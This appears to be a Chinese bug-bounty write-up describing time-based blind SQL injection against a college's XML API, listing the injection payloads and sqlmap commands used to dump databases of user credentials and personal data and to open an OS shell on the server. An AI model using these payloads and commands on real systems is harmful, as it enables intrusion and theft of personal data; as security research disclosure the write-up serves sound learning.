无意中发现一些数据是通过 API 获取的:(其实这种数据也很常见,就是其页面是一个XML文件)

所以这里启动了 Burp，并在battering模式下通过intruder发送了以下SQL盲注有效负载。

' or sleep(5)#--
' or sleep(5)='
;waitfor delay '0:0:5'--
') or sleep(5)='

结果：

;waitfor delay '0:0:5'--

这一条语句被执行。

数据库延迟了5秒钟返回了数据包。

请注意查看图片右下角的时间。（5193ms）

下面是延迟10秒

右下角时间戳（10114ms）

后面使用sqlmap这个工具，利用该工具，能看到所有的数据库。

数据库相当大，包含：用户名、密码、备份、地址、电话号码、电子邮件……

获取shell的方式很简单，这里使用sqlmap获取shell。

sqlmap -u "https://xxx.com/api/v1/StudentSomething?parameter1=9999" -H "Cookie: uni-cookie=MY-COOKIE-HERE"  --random-agent --os-cmd whoami

sqlmap响应

返回了MSSQL的路径，且返回了我是DBA用户。（DBA：数据库管理员）

之后，进行shell尝试。

sqlmap -u "https://snoopy-college.tld/api/v1/StudentSomething?parameter1=9999" -H "Cookie: uni-cookie=MY-COOKIE-HERE"  --random-agent --os-shell

如上所示，返回了shell。

黑帽黑客可能会滥用此功能来：

• 破坏网站
• 关闭服务器/网站
• 提取服务器上的所有文件（使用FTP服务器或其他）
• 删除所有文件和目录

往期回顾

xss研究笔记

SSRF研究笔记

dom-xss精选文章

2022年度精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips

福利视频

笔者自己录制的一套php视频教程(适合0基础的),感兴趣的童鞋可以看看,基础视频总共约200多集,目前已经录制完毕,后续还有更多视频出品

https://space.bilibili.com/177546377/channel/seriesdetail?sid=2949374

技术交流

技术交流请加笔者微信:richardo1o1 (暗号:growing)